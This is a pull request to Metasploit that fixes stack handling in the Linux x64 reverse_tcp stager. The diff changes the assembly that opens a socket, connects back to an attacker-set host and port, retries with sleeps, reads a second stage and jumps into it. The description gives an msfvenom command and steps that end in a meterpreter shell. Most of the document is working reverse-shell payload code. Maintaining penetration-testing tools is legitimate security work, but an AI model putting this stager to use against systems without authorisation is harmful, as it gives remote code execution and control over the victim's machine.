### PR TITLE
Fix stack in payload/linux/x64/reverse_tcp

### DIFF
--- a/lib/msf/core/payload/linux/x64/reverse_tcp.rb
+++ b/lib/msf/core/payload/linux/x64/reverse_tcp.rb
@@ -107,10 +107,10 @@ module Payload::Linux::ReverseTcp_x64
 
         push   #{retry_count}        ; retry counter
         pop    r9
-
-      create_socket:
         push   rsi
         push   rax
+
+      create_socket:
         push   0x29
         pop    rax
         cdq
@@ -122,8 +122,9 @@ module Payload::Linux::ReverseTcp_x64
         test   rax, rax
         js failed
 
-      connect:
         xchg   rdi, rax
+
+      connect:
         mov    rcx, 0x#{encoded_host}#{encoded_port}
         push   rcx
         mov    rsi, rsp
@@ -132,12 +133,14 @@ module Payload::Linux::ReverseTcp_x64
         push   0x2a
         pop    rax
         syscall ; connect(3, {sa_family=AF_INET, LPORT, LHOST, 16)
+        pop    rcx
         test   rax, rax
         jns    recv
 
       handle_failure:
         dec    r9
         jz     failed
+        push   rdi
         push   0x23
         pop    rax
         push   0x#{sleep_nanoseconds.to_s(16)}
@@ -145,19 +148,11 @@ module Payload::Linux::ReverseTcp_x64
         mov    rdi, rsp
         xor    rsi, rsi
         syscall                      ; sys_nanosleep
-        test   rax, rax
-        jns    create_socket
-        jmp    failed
-
-      recv:
         pop    rcx
-        pop    rsi
-        pop    rdx
-        syscall	; read(3, "", 4096)
+        pop    rcx
+        pop    rdi
         test   rax, rax
-        js     failed
-
-        jmp    rsi ; to stage
+        jns    connect
 
       failed:
         push   0x3c
@@ -165,6 +160,15 @@ module Payload::Linux::ReverseTcp_x64
         push   0x1
         pop    rdi
         syscall ; exit(1)
+
+      recv:
+        pop    rsi
+        pop    rdx
+        syscall ; read(3, "", 4096)
+        test   rax, rax
+        js     failed
+
+        jmp    rsi ; to stage
     ^
 
     asm


### PR DESCRIPTION
This is a fix for [issue 9963](https://github.com/rapid7/metasploit-framework/issues/9963).

## Verification

1. generate the payload: using for instance `msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f elf -a x64 --platform linux`
2. execute the payload without any handler. It should return after a while.
3. launch the payload first and after a few seconds the handler. One should obtain a meterpreter shell.
4. execute the payload while the handler is running. One should obtain a meterpreter shell.
